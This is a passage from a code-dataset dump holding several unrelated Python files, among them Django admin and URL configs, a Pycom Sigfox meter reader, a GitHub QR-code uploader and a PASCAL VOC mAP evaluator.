go when you've logged out - will send you to the entry page if not set\nCAS_LOGOUT_DESTINATION = ''\n#A page to show if validation fails\nCAS_FAILURE_PAGE = None\n\nif CAS_SERVICE != '':\n fs_session_store = FilesystemSessionStore()\n application = CASMiddleware(application, cas_root_url = CAS_SERVICE, logout_url = CAS_LOGOUT_PAGE, logout_dest = CAS_LOGOUT_DESTINATION, protocol_version = CAS_VERSION, casfailed_url = CAS_FAILURE_PAGE, entry_page = '/static/main.html', session_store = fs_session_store, ignore_redirect = '(.*)\\?datatype=', ignored_callback = ignored_callback)\n\n","sub_path":"wsgi_app/wsgi_static.py","file_name":"wsgi_static.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"92505957","text":"\nfrom network import WLAN\nimport machine\nimport time\nfrom machine import I2C\nfrom machine import SPI\nfrom machine import Pin\nfrom network import Sigfox\nimport socket\nimport ssd1306\nimport pycom\n\npycom.wifi_on_boot(False)\n\n#wlan=WLAN()\n#wlan.deinit()\n\n#Reseteo de display OLED #bugfix Random Pixels\nrst_oled=machine.Pin('P23',Pin.OUT)\nrst_oled.value(0)\ntime.sleep_ms(1000)\nrst_oled.value(1)\ntime.sleep_ms(2000)\nspi=SPI(0,mode=SPI.MASTER, baudrate=9600, pins=('P2','P3','P4'))\n#spi = machine.SPI(1, baudrate=31250, sck=machine.Pin('P5'), mosi=machine.Pin('P6'),miso=machine.Pin('P7'))\ni2c=I2C(0,pins=('P9','P10'))#scl=machine.Pin(10),sda=machine.Pin(9)) #D0,D1\noled=ssd1306.SSD1306_I2C(128,64,i2c,addr=i2c.scan()[0])\n\noled.fill(1)\noled.show()\ntime.sleep_ms(200)\noled.fill(0)\noled.show()\n\ndef get_reading():\n result=''\n buffer=[]\n read=b''\n spi_request=machine.Pin('P4',Pin.OUT)\n spi_request.value(0)\n time.sleep_ms(10)\n spi_request.value(1)\n time.sleep_ms(10)\n spi=SPI(0,mode=SPI.MASTER, baudrate=9600, pins=('P2','P3','P4'))\n read=spi.read(1)\n while read!=b'\\x7A' and read!=b'\\xff' and read!=b'\\x00':\n #time.sleep_ms(1)\n if read!=b'\\x00':\n try:\n buffer.append(read.decode())\n except Exception as e:\n pass\n else:\n break\n read=spi.read(1)\n if buffer!=[]:\n try:\n result=int(\"\".join([str(l) for l in buffer]))\n except Exception as e:\n pass\n else:\n result='z'\n return result\n\nsigfox = Sigfox(mode=Sigfox.SIGFOX, rcz=Sigfox.RCZ2)\ns = socket.socket(socket.AF_SIGFOX, socket.SOCK_RAW)\ns.setblocking(True)\ns.setsockopt(socket.SOL_SIGFOX, socket.SO_RX, False)\n\nbattery_level=80\nadc=machine.ADC()\napin=adc.channel(pin='P17',attn=adc.ATTN_2_5DB)\n\nwhile True:\n result=get_reading()\n if result!='z':\n try:\n data=hex(result)\n data=data[2:]\n s.send(data)\n print(data)\n result=result*0.05\n\n strL0=\"Consumo: \"\n strL1=str(result) + \" m3\"\n #strL2=\"Serv_Stat: \"+\"True\" if connection_status==True else \"Serv_Stat: \"+\"False\"\n #strL3=\"Wifi_Stat: \"+\"True\" if wlan.isconnected() else \"Wifi_Stat: \"+\"False\"\n battery_level=0\n for i in range(100):\n battery_level=battery_level+apin.voltage();\n battery_level=battery_level/1100\n strL4=\"Battery: \"+str(round(battery_level,2))+\"%\"\n oled.fill(0)\n oled.show()\n oled.text(strL0,0,0,1)\n oled.text(strL1,0,10,1)\n #oled.text(strL2,0,20,1)\n #oled.text(strL3,0,30,1)\n oled.text(strL4,0,40,1)\n oled.show()\n except Exception as e:\n print(e)\n print(\"Message sent\")\n time.sleep(120)\n","sub_path":"Atom-SiPy/SPI_Test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"326603392","text":"from django.conf import settings\nfrom django.conf.urls import patterns, include, url\nfrom django.views.generic import TemplateView\nfrom applications.org_structure.views import UserProfileListView, SympaLoginView, SympaLogoutView, handler403, handler404, handler500\nfrom applications.report.views import dashboard\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'project.views.commercial', name='commercial'),\n # url(r'^project/', include('project.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\t\n\t# (r'^static/(?P.*)$', 'django.views.static.serve', {'document_root': settings.STATIC_ROOT}),\n url(r'^$', UserProfileListView.as_view(), name='home'), # UserProfileListView.as_view() dashboard\n\turl(r'^static/(?P.*)$', 'django.views.static.serve', { 'document_root': settings.STATIC_ROOT, }),\n url(r'^media/(?P.*)$', 'django.views.static.serve', { 'document_root': settings.MEDIA_ROOT, }),\n\n (r'^geolocalization/', include('applications.geo_location.urls')),\n (r'^org_structure/',include('applications.org_structure.urls')),\n (r'^org_pfa/',include('applications.org_pfa.urls')),\n (r'^report/',include('applications.report.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n #url(r'^login/$', 'django.contrib.auth.views.login',{'template_name': 'login/signin.html'}),\n #url(r'^logout/$', 'django.contrib.auth.views.logout'),\n (r'^tinymce/', include('tinymce.urls')),\n\n url(r'^login/$', SympaLoginView.as_view() , name=\"login\"),\n url(r'^logout/$', SympaLogoutView.as_view(), name=\"logout\"),\n\n url(r'^500/$',TemplateView.as_view(template_name='500.html'), name='error_500' ),\n url(r'^404/$',TemplateView.as_view(template_name='404.html'), name='error_404' ),\n url(r'^403/$',TemplateView.as_view(template_name='403.html'), name='error_403' ),\n\n\n)\n","sub_path":"sympa/sympa/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"136547923","text":"from github import Github\nimport qrcode\nimport os\n\ntoken = 'INSERT HERE YOUR GITHUB ACCESS TOKEN'\ng = Github(token)\n\ndef GerarQrCode(cpf):\n imagem_qrcode = qrcode.make(cpf)\n imagem_qrcode.save(str(cpf)+'.png')\n repo = g.get_user().get_repo(\"moreDevs2Blu\")\n all_files = []\n contents = repo.get_contents(\"\")\n while contents:\n file_content = contents.pop(0)\n if file_content.type == \"dir\":\n contents.extend(repo.get_contents(file_content.path))\n else:\n file = file_content\n all_files.append(str(file).replace('ContentFile(path=\"','').replace('\")',''))\n\n image = open(str(cpf)+'.png', 'rb')\n content = image.read()\n\n # Upload to github\n git_file = str(cpf)+'.png'\n if git_file in all_files:\n contents = repo.get_contents(git_file)\n repo.update_file(contents.path, \"committing files\", content, contents.sha, branch=\"main\")\n image.close()\n os.remove(str(cpf)+'.png')\n return \"https://vinicios-tribess.github.io/moreDevs2Blu/\" + str(cpf) + '.png'\n else:\n repo.create_file(git_file, \"committing files\", content, branch=\"main\")\n image.close()\n os.remove(str(cpf)+'.png')\n return \"https://vinicios-tribess.github.io/moreDevs2Blu/\" + str(cpf) + '.png'","sub_path":"Agendamento/QrCode.py","file_name":"QrCode.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"603749193","text":"import numpy as np\nimport pandas as pd\nimport ntpath\n\nimport os\n\n\ndef split_path_name(path):\n# print(ntpath.split(path))\n head, tail = ntpath.split(path)\n if tail == '':\n return ntpath.split(head)\n else:\n return head, tail\n \n\nclass IfsHolderBasic(object):\n \n def __init__(self, path_file_csv, path_file_config=None):\n self.df_ifs = pd.read_csv(path_file_csv)\n# names=['id', 'label', 'mu', 'nu'],\n# index_col='id')\n self.base_path, self.file_name = split_path_name(path_file_csv)\n self.full_path = os.path.join(self.base_path, self.file_name)\n if path_file_config is not None:\n self.df_config = pd.read_csv(path_file_config, \n index_col=False)\n# self.mus = np.asarray(df_ifs['mu'], dtype=float)\n# self.nus = np.asarray(df_ifs['nu'], dtype=float)\n# self.id = np.asarray(df_ifs['id'], dtype=int)\n \n @property\n def get_mus(self):\n return np.asarray(self.df_ifs['mu'].astype(float), dtype=float)\n \n @property\n def get_nus(self):\n return np.asarray(self.df_ifs['nu'].astype(float), dtype=float)\n \n @property\n def get_idx(self):\n return np.asarray(self.df_ifs.index.astype(int), dtype=int)\n\n \n def set_ifs(self, mus, nus, idx, path_file=None):\n# path = path_file if path_file is not None else self.full_path\n assert(len(idx)==len(mus)==len(nus))\n dic = {'mu': np.asarray(mus, dtype=float),\n 'nu': np.asarray(nus, dtype=float)}\n self.df_ifs = pd.DataFrame(dic, index=idx)\n \n if path_file is not None:\n self.df_ifs.to_csv(path_file, sep=',', index=True)\n \n def set_conf(self, dic, path_config):\n self.df_config.to_csv(dic)\n\n\n\nif __name__ == '__main__':\n# from ifs_holder_basic import IfsHolderBasic\n filepath = os.path.join(os.getcwd() , 'ifsholder/ifs_holder.csv')\n\n ifs_basic = IfsHolderBasic(filepath,\n None)\n print(ifs_basic.get_mus)\n# print(ifs_basic.df_ifs)","sub_path":"ifs_holder_basic.py","file_name":"ifs_holder_basic.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"136315377","text":"from elastic.management.loaders.loader import JSONLoader, MappingProperties\nimport requests\nimport logging\n\n# Get an instance of a logger\nlogger = logging.getLogger(__name__)\n\n\nclass CriteriaManager(JSONLoader):\n\n def create_criteria(self, **options):\n ''' Create alias index mapping and load data '''\n idx_name = self.get_index_name(**options)\n idx_types = self.get_index_type(**options)\n mart_project = self.get_project(**options)\n\n for idx_type in idx_types:\n logger.warn('idx name ' + idx_name)\n logger.warn('idx_type' + idx_type)\n logger.warn('project name ' + mart_project)\n mart_url = 'https://mart.' + mart_project + '.org/biomart/martservice?'\n # mart_url = 'https://mart-dev-imb/biomart/martservice?'\n mart_object = self.get_object_type(idx_type)\n logger.warn('mart_project ' + mart_project + ' mart_object ' + mart_object)\n mart_dataset = mart_project + '_criteria_' + mart_object\n criteria_json = self.get_criteria_info_from_biomart(mart_url, mart_dataset, idx_type, **options)\n processed_criteria_json = self._post_process_criteria_info(criteria_json, **options)\n self._create_criteria_mapping(**options)\n self.load(processed_criteria_json, idx_name, idx_type)\n\n def _create_criteria_mapping(self, **options):\n ''' Create the mapping for alias indexing '''\n idx_types = self.get_index_type(**options)\n\n for idx_type in idx_types:\n props = self.get_properties(idx_type, **options)\n self.mapping(props, idx_type=idx_type, meta=None, analyzer=self.KEYWORD_ANALYZER, **options)\n\n def _post_process_criteria_info(self, criteria_json, **options):\n doc = []\n for row in criteria_json['data']:\n current_row = self.process_row(row, **options)\n doc.append(current_row)\n return doc\n\n def process_row(self, row, **options):\n current_row = {}\n current_row['Name'] = row['Name']\n current_row['Primary id'] = row['Primary id']\n current_row['Object class'] = row['Object class']\n current_row['Total score'] = row['Total score']\n for org in self.get_organism_enabled(**options):\n for dis in self.get_diseases_enabled(**options):\n dis_org_header = dis + '_' + org\n score_key = dis + ' ' + org + ' score'\n score_key = score_key.strip()\n\n flag_key = dis + ' ' + org + ' flag'\n flag_key = flag_key.strip()\n\n current_row_score = None\n current_row_flag = None\n\n if score_key in row:\n current_row_score = row[score_key]\n\n if flag_key in row:\n current_row_flag = row[flag_key]\n\n if current_row_score is None or len(current_row_score) == 0:\n current_row_score = '0'\n\n if current_row_flag is None or len(current_row_flag) == 0:\n current_row_flag = '0'\n\n if current_row_score is not None and current_row_flag is not None:\n current_row_score_flag = current_row_score + ':' + current_row_flag\n current_row[dis_org_header] = current_row_score_flag\n\n return current_row\n\n def get_properties(self, idx_type, **options):\n ''' Create the mapping for criteria index '''\n props = MappingProperties(idx_type)\n props.add_property(\"Name\", \"string\", analyzer=\"full_name\")\n props.add_property(\"Primary id\", \"string\", index=\"not_analyzed\")\n props.add_property(\"Total score\", \"string\", index=\"no\")\n dis_orgs = self.get_dis_orgs(**options)\n for dis_org in dis_orgs:\n props.add_property(dis_org, \"string\", index=\"no\")\n\n return props\n\n def get_organism_enabled(self, **options):\n project = self.get_project(**options)\n if(project == \"immunobase\"):\n return ['Hs']\n elif(project == \"t1dbase\"):\n return ['Hs', 'Mm', 'Rn']\n\n return ['Hs']\n\n def get_diseases_enabled(self, **options):\n project = self.get_project(**options)\n if(project == \"immunobase\"):\n return sorted(['AS', 'ATD', 'CEL', 'CRO', 'JIA', 'MS', 'PBC', 'PSO', 'RA', 'SLE', 'T1D', 'UC', 'OD'])\n elif(project == \"t1dbase\"):\n return ['T1D']\n\n return sorted(['AS', 'ATD', 'CEL', 'CRO', 'JIA', 'MS', 'PBC', 'PSO', 'RA', 'SLE', 'T1D', 'UC', 'OD'])\n\n def get_dis_orgs(self, **options):\n dis_orgs = []\n orgs_enabled = self.get_organism_enabled(**options)\n dis_enabled = self.get_diseases_enabled(**options)\n for dis in dis_enabled:\n for org in orgs_enabled:\n dis_orgs.append(dis + '_' + org)\n return sorted(dis_orgs)\n\n def get_object_type(self, idx_type):\n ''' Get object type '''\n if(idx_type == 'gene'):\n return 'genes'\n if(idx_type == 'locus'):\n return 'regions'\n if(idx_type == 'marker'):\n return 'markers'\n if(idx_type == 'study'):\n return 'studies'\n\n def get_index_type(self, **options):\n ''' Get indexType option '''\n idx_type = []\n if options['indexType']:\n idx_type.append(options['indexType'].lower())\n else:\n idx_type.extend(['gene', 'locus', 'marker', 'study'])\n return idx_type\n\n def get_project(self, **options):\n '''return project name'''\n if options['indexProject']:\n return options['indexProject'].lower()\n else:\n return \"immunobase\"\n\n def get_criteria_info_from_biomart(self, mart_url, mart_dataset, idx_type, **options):\n urlTemplate = \\\n mart_url + \\\n 'query=' \\\n '' \\\n '' \\\n '' \\\n '' \\\n '' \\\n '' \\\n\n flag_query = ''\n for dis_org in self.get_dis_orgs(**options):\n flag_query += ''\n flag_query += ''\n\n urlTemplate += flag_query\n\n if(options['applyFilter']):\n filter_value = ''\n if(idx_type == 'gene'):\n filter_value = 'ptpn22'\n elif(idx_type == 'locus'):\n filter_value = '1p13.2'\n elif(idx_type == 'marker'):\n filter_value = 'rs2476601'\n elif(idx_type == 'study'):\n filter_value = 'barrett'\n\n filter_query = ''\n urlTemplate += filter_query\n\n urlTemplate += '' + ''\n queryURL = urlTemplate\n req = requests.get(queryURL, stream=True, verify=False)\n return req.json()\n","sub_path":"elastic/management/loaders/criteria.py","file_name":"criteria.py","file_ext":"py","file_size_in_byte":7388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"492100060","text":"class Duree:\n def __init__(self,heure,minute,seconde):\n self.__heure=heure\n self.__minute=minute\n self.__seconde=seconde\n\n def __str__(self):\n if self.__minute>59:\n nb=self.__minute//60\n self.__heure+=nb\n self.__minute-=nb*60\n if self.__seconde>59:\n nb=self.__seconde//60\n self.__minute+=nb\n self.__seconde-=nb*60\n return str(self.__heure)+\"h\"+str(self.__minute)+\"m\"+str(self.__seconde)+'s'\n\n def __add__(self, other):\n return Duree(self.__heure+other.__heure,self.__minute+other.__minute,self.__seconde+other.__seconde)\n\nif __name__== '__main__':\n D1=Duree(5,20,6)\n D2=Duree(6,50,66)\n D3=D1+D2\n print(D1)\n print(D3)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"229660746","text":"import numpy as np\n\n\ndef mean_average_precision(gt_list, pred_list, confidence_score=True, classes=[\"car\"]):\n \"\"\"\n Mean Average Precision calculation\n Parameters:\n gt_list: [[Detection,...],...]\n pred_list: [[Detection,...],...]\n confidence_score: indicates the method to compute the map\n classes: indicates the classes of the dataset\n \"\"\"\n\n precs = []\n recs = []\n aps = []\n for c in classes:\n gt_list_class = [[det for det in boxlist if det.label == c] for boxlist in gt_list]\n pred_list_class = [[det for det in boxlist if det.label == c] for boxlist in pred_list]\n ap, prec, rec = average_precision(gt_list_class, pred_list_class, confidence_score)\n precs.append(prec)\n recs.append(rec)\n aps.append(ap)\n prec = np.mean(precs)\n rec = np.mean(recs)\n map = np.mean(aps)\n\n return map, prec, rec\n\n\ndef average_precision(gt_list, pred_list, confidence_score=True):\n \"\"\"\n Average Precision with or without confidence scores.\n Params:\n gt_list: [[Detection,...],...]\n pred_list: [[Detection,...],...]\n \"\"\"\n\n pred_list = [(i, det) for i in range(len(pred_list)) for det in pred_list[i]]\n if len(pred_list) == 0:\n return 0\n\n if confidence_score :\n sorted_ind = np.argsort([-det[1].score for det in pred_list])\n pred_list_sorted = [pred_list[i] for i in sorted_ind]\n ap, prec, rec = voc_ap(gt_list, pred_list_sorted)\n else:\n n = 10\n precs = []\n recs = []\n aps = []\n for _ in range(n):\n shuffled_ind = np.random.permutation(len(pred_list))\n pred_list_shuffled = [pred_list[i] for i in shuffled_ind]\n ap, prec, rec = voc_ap(gt_list, pred_list_shuffled)\n precs.append(prec)\n recs.append(rec)\n aps.append(ap)\n prec = np.mean(precs)\n rec = np.mean(recs)\n ap = np.mean(aps)\n return ap, prec, rec\n\n\n# Below code is adapted from\n# https://github.com/facebookresearch/detectron2/blob/master/detectron2/evaluation/pascal_voc_evaluation.py\n\ndef voc_ap(gt_list, pred_list, ovthresh=0.5):\n \"\"\"\n Average Precision as defined by PASCAL VOC (11-point tracking).\n Params:\n gt_list: [[Detection,...],...]\n pred_list: [Detection,...]\n ovthresh: overlap threshold.\n \"\"\"\n\n class_recs = []\n npos = 0\n for R in gt_list:\n bbox = np.array([det.bbox for det in R])\n det = [False] * len(R)\n npos += len(R)\n class_recs.append({\"bbox\": bbox, \"det\": det})\n\n image_ids = [det[0] for det in pred_list]\n BB = np.array([det[1].bbox for det in pred_list]).reshape(-1, 4)\n\n # go down dets and mark TPs and FPs\n nd = len(image_ids)\n tp = np.zeros(nd)\n fp = np.zeros(nd)\n for d in range(nd):\n R = class_recs[image_ids[d]]\n bb = BB[d, :].astype(float)\n ovmax = -np.inf\n BBGT = R[\"bbox\"].astype(float)\n\n if BBGT.size > 0:\n # compute overlaps\n overlaps = iou_vectorized(BBGT, bb[None, :])\n ovmax = np.max(overlaps)\n jmax = np.argmax(overlaps)\n\n if ovmax > ovthresh:\n if not R[\"det\"][jmax]:\n tp[d] = 1.0\n R[\"det\"][jmax] = 1\n else:\n fp[d] = 1.0\n else:\n fp[d] = 1.0\n\n # compute precision recall\n fp = np.cumsum(fp)\n tp = np.cumsum(tp)\n rec = tp / float(npos)\n # avoid divide by zero in case the first detection matches a difficult\n # ground truth\n prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)\n\n # compute VOC AP using 11 point metric\n ap = 0.0\n for t in np.arange(0.0, 1.1, 0.1):\n if np.sum(rec >= t) == 0:\n p = 0\n else:\n p = np.max(prec[rec >= t])\n ap = ap + p / 11.0\n\n return ap, prec, rec","sub_path":"W1/Adapted_voc_evaluation.py","file_name":"Adapted_voc_evaluation.py","file_ext":"py","file_size_in_byte":3887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"2307422","text":"from django import forms\nfrom django.contrib import admin\nfrom django.contrib.admin import helpers\nfrom django.contrib.admin.util import unquote\nfrom django.core.exceptions import PermissionDenied\nfrom django.db import transaction, models\nfrom django.forms.formsets import all_valid\nfrom django.http import Http404\nfrom django.utils.decorators import method_decorator\nfrom django.utils.encoding import force_unicode\nfrom django.utils.html import escape\nfrom django.utils.safestring import mark_safe\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.utils.translation import ugettext as _\nfrom catalog.forms import product_attributes_form_factory, build_initial_details\nfrom catalog.models import Catalog, Product, ProductAttribute, ProductDetail, CatalogCategory, Manufacturer, SmartFilter, ProductSmartFilter, ProductFilter\nfrom generic_images.admin import AttachedImagesInline\n\n__author__ = 'LittleJoe'\n\nclass CatalogAdmin(admin.ModelAdmin):\n list_display = ['name', 'slug']\n prepopulated_fields = {\"slug\": (\"name\",)}\nadmin.site.register(Catalog, CatalogAdmin)\n\n#\nclass ProductSmartFilterTabular(admin.TabularInline):\n model = ProductSmartFilter\n\ncsrf_protect_m = method_decorator(csrf_protect)\nclass ProductAdmin(admin.ModelAdmin):\n list_display = ['name', 'category', 'price', 'slug']\n prepopulated_fields = {\"slug\": (\"name\",)}\n inlines = [AttachedImagesInline, ProductSmartFilterTabular]\n\n class Media:\n js = ( \"base/js/category_select.js\",)# \"base/js/fill_smart_filters.js\")\n\n def save_model(self, request, obj, form, change):\n obj.save()\n return obj\n\n def get_form(self, request, obj=None, **kwargs):\n # just save obj reference for future processing in Inline\n request._obj_ = obj\n return super(ProductAdmin, self).get_form(request, obj, **kwargs)\n\n\n @csrf_protect_m\n @transaction.commit_on_success\n def add_view(self, request, form_url='', extra_context=None):\n \"The 'add' admin view for this model.\"\n model = self.model\n opts = model._meta\n\n if not self.has_add_permission(request):\n raise PermissionDenied\n\n ModelForm = self.get_form(request)\n formsets = []\n if request.method == 'POST':\n form = ModelForm(request.POST, request.FILES)\n\n #dirty hack\n attrs = ProductAttribute.objects.filter(category=request.POST.get('category'))\n AttrsForm = product_attributes_form_factory(attrs)\n attrs_form = AttrsForm(data=request.POST, prefix='attrs')\n #-----------\n\n if form.is_valid() and attrs_form.is_valid():\n new_object = self.save_form(request, form, change=False)\n form_validated = True\n else:\n form_validated = False\n new_object = self.model()\n prefixes = {}\n for FormSet, inline in zip(self.get_formsets(request), self.inline_instances):\n prefix = FormSet.get_default_prefix()\n prefixes[prefix] = prefixes.get(prefix, 0) + 1\n if prefixes[prefix] != 1:\n prefix = \"%s-%s\" % (prefix, prefixes[prefix])\n formset = FormSet(data=request.POST, files=request.FILES,\n instance=new_object,\n save_as_new=\"_saveasnew\" in request.POST,\n prefix=prefix, queryset=inline.queryset(request))\n formsets.append(formset)\n if all_valid(formsets) and form_validated:\n prod_obj = self.save_model(request, new_object, form, change=False)\n form.save_m2m()\n\n #hack again\n attrs_form.save(prod_obj)\n #---------\n for formset in formsets:\n self.save_formset(request, form, formset, change=False)\n\n self.log_addition(request, new_object)\n return self.response_add(request, new_object)\n else:\n # Prepare the dict of initial data from the request.\n # We have to special-case M2Ms as a list of comma-separated PKs.\n initial = dict(request.GET.items())\n for k in initial:\n try:\n f = opts.get_field(k)\n except models.FieldDoesNotExist:\n continue\n if isinstance(f, models.ManyToManyField):\n initial[k] = initial[k].split(\",\")\n form = ModelForm(initial=initial)\n prefixes = {}\n for FormSet, inline in zip(self.get_formsets(request),\n self.inline_instances):\n prefix = FormSet.get_default_prefix()\n prefixes[prefix] = prefixes.get(prefix, 0) + 1\n if prefixes[prefix] != 1:\n prefix = \"%s-%s\" % (prefix, prefixes[prefix])\n formset = FormSet(instance=self.model(), prefix=prefix,\n queryset=inline.queryset(request))\n formsets.append(formset)\n\n #hack again\n attrs = ProductAttribute.objects.filter(category=0)\n AttrsForm = product_attributes_form_factory(attrs)\n attrs_form = AttrsForm(data=request.POST, prefix='attrs')\n #------------\n\n adminForm = helpers.AdminForm(form, list(self.get_fieldsets(request)),\n self.prepopulated_fields, self.get_readonly_fields(request),\n model_admin=self)\n media = self.media + adminForm.media\n\n inline_admin_formsets = []\n for inline, formset in zip(self.inline_instances, formsets):\n fieldsets = list(inline.get_fieldsets(request))\n readonly = list(inline.get_readonly_fields(request))\n inline_admin_formset = helpers.InlineAdminFormSet(inline, formset,\n fieldsets, readonly, model_admin=self)\n inline_admin_formsets.append(inline_admin_formset)\n media = media + inline_admin_formset.media\n\n context = {\n 'title': _('Add %s') % force_unicode(opts.verbose_name),\n 'adminform': adminForm,\n 'is_popup': \"_popup\" in request.REQUEST,\n 'show_delete': False,\n 'media': mark_safe(media),\n 'inline_admin_formsets': inline_admin_formsets,\n 'errors': helpers.AdminErrorList(form, formsets),\n 'root_path': self.admin_site.root_path,\n 'app_label': opts.app_label,\n 'attrs_form': attrs_form,\n 'load_attrs_form': request.method == 'GET',\n }\n context.update(extra_context or {})\n return self.render_change_form(request, context, form_url=form_url, add=True)\n\n\n @csrf_protect_m\n @transaction.commit_on_success\n def change_view(self, request, object_id, extra_context=None):\n \"The 'change' admin view for this model.\"\n model = self.model\n opts = model._meta\n\n obj = self.get_object(request, unquote(object_id))\n\n if not self.has_change_permission(request, obj):\n raise PermissionDenied\n\n if obj is None:\n raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % {'name': force_unicode(opts.verbose_name), 'key': escape(object_id)})\n\n if request.method == 'POST' and \"_saveasnew\" in request.POST:\n return self.add_view(request, form_url='../add/')\n\n ModelForm = self.get_form(request, obj)\n formsets = []\n if request.method == 'POST':\n form = ModelForm(request.POST, request.FILES, instance=obj)\n\n #dirty hack\n attrs = ProductAttribute.objects.filter(category=request.POST.get('category'))\n details = ProductDetail.objects.filter(product=obj)\n AttrsForm = product_attributes_form_factory(attrs)\n attrs_form = AttrsForm(data=request.POST, prefix='attrs')\n #-----------\n\n if form.is_valid() and attrs_form.is_valid():\n form_validated = True\n new_object = self.save_form(request, form, change=True)\n else:\n form_validated = False\n new_object = obj\n prefixes = {}\n for FormSet, inline in zip(self.get_formsets(request, new_object),\n self.inline_instances):\n prefix = FormSet.get_default_prefix()\n prefixes[prefix] = prefixes.get(prefix, 0) + 1\n if prefixes[prefix] != 1:\n prefix = \"%s-%s\" % (prefix, prefixes[prefix])\n formset = FormSet(request.POST, request.FILES,\n instance=new_object, prefix=prefix,\n queryset=inline.queryset(request))\n\n formsets.append(formset)\n\n if all_valid(formsets) and form_validated:\n prod_obj = self.save_model(request, new_object, form, change=True)\n form.save_m2m()\n\n #hack again\n attrs_form.update(prod_obj, details)\n #---------\n\n for formset in formsets:\n self.save_formset(request, form, formset, change=True)\n\n change_message = self.construct_change_message(request, form, formsets)\n self.log_change(request, new_object, change_message)\n return self.response_change(request, new_object)\n\n else:\n form = ModelForm(instance=obj)\n prefixes = {}\n for FormSet, inline in zip(self.get_formsets(request, obj), self.inline_instances):\n prefix = FormSet.get_default_prefix()\n prefixes[prefix] = prefixes.get(prefix, 0) + 1\n if prefixes[prefix] != 1:\n prefix = \"%s-%s\" % (prefix, prefixes[prefix])\n formset = FormSet(instance=obj, prefix=prefix,\n queryset=inline.queryset(request))\n formsets.append(formset)\n\n #hack again\n attrs = ProductAttribute.objects.filter(category=obj.category)\n init_details = build_initial_details(ProductDetail.objects.filter(product=obj))\n AttrsForm = product_attributes_form_factory(attrs)\n attrs_form = AttrsForm(prefix='attrs', initial=init_details)\n #------------\n\n adminForm = helpers.AdminForm(form, self.get_fieldsets(request, obj),\n self.prepopulated_fields, self.get_readonly_fields(request, obj),\n model_admin=self)\n media = self.media + adminForm.media\n\n inline_admin_formsets = []\n for inline, formset in zip(self.inline_instances, formsets):\n fieldsets = list(inline.get_fieldsets(request, obj))\n readonly = list(inline.get_readonly_fields(request, obj))\n inline_admin_formset = helpers.InlineAdminFormSet(inline, formset,\n fieldsets, readonly, model_admin=self)\n inline_admin_formsets.append(inline_admin_formset)\n media = media + inline_admin_formset.media\n\n context = {\n 'title': _('Change %s') % force_unicode(opts.verbose_name),\n 'adminform': adminForm,\n 'object_id': object_id,\n 'original': obj,\n 'is_popup': \"_popup\" in request.REQUEST,\n 'media': mark_safe(media),\n 'inline_admin_formsets': inline_admin_formsets,\n 'errors': helpers.AdminErrorList(form, formsets),\n 'root_path': self.admin_site.root_path,\n 'app_label': opts.app_label,\n 'attrs_form': attrs_form,\n }\n context.update(extra_context or {})\n return self.render_change_form(request, context, change=True, obj=obj)\n\nadmin.site.register(Product, ProductAdmin)\n\n#\nclass ProductAttributeTabular(admin.TabularInline):\n model = ProductAttribute\n\n formfield_overrides = {\n models.TextField: {'widget': forms.Textarea(attrs={'rows': 3})},\n }\n\nclass SmartFilterTabular(admin.TabularInline):\n model = SmartFilter\n\n formfield_overrides = {\n models.TextField: {'widget': forms.Textarea(attrs={'rows': 3})},\n }\n\nclass ProductFilterTabular(admin.TabularInline):\n model = ProductFilter\n\n formfield_overrides = {\n models.TextField: {'widget': forms.Textarea(attrs={'rows': 3})},\n }\n\n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n if db_field.name == \"attribute\":\n if request._obj_:\n kwargs[\"queryset\"] = ProductAttribute.objects.filter(category=request._obj_)\n else:\n kwargs[\"queryset\"] = ProductAttribute.objects.none()\n return super(ProductFilterTabular, self).formfield_for_foreignkey(db_field, request, **kwargs)\n\nclass CatalogCategoryAdmin(admin.ModelAdmin):\n prepopulated_fields = {\"slug\": (\"name\",)}\n inlines = [ProductAttributeTabular, SmartFilterTabular, ProductFilterTabular]\n\n formfield_overrides = {\n models.TextField: {'widget': forms.Textarea(attrs={'rows': 3})},\n }\n #class Media:\n #css = ( \"base/css/short_textarea.css\",)\n\n def get_form(self, request, obj=None, **kwargs):\n # just save obj reference for future processing in Inline\n request._obj_ = obj\n return super(CatalogCategoryAdmin, self).get_form(request, obj, **kwargs)\nadmin.site.register(CatalogCategory, CatalogCategoryAdmin)\n\n#\nadmin.site.register(ProductDetail)\n\n#\nadmin.site.register(ProductAttribute)\n\n#\nclass ManufacturerAdmin(admin.ModelAdmin):\n list_display = ['name', 'slug', 'url']\n prepopulated_fields = {\"slug\": (\"name\",)}\nadmin.site.register(Manufacturer, ManufacturerAdmin)","sub_path":"catalog/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":13655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"200241958","text":"#!/usr/bin/python3\n\nimport copy\nimport os\nimport sys\nimport glob\n\n## Import path hacking to make this run referencing the modules it 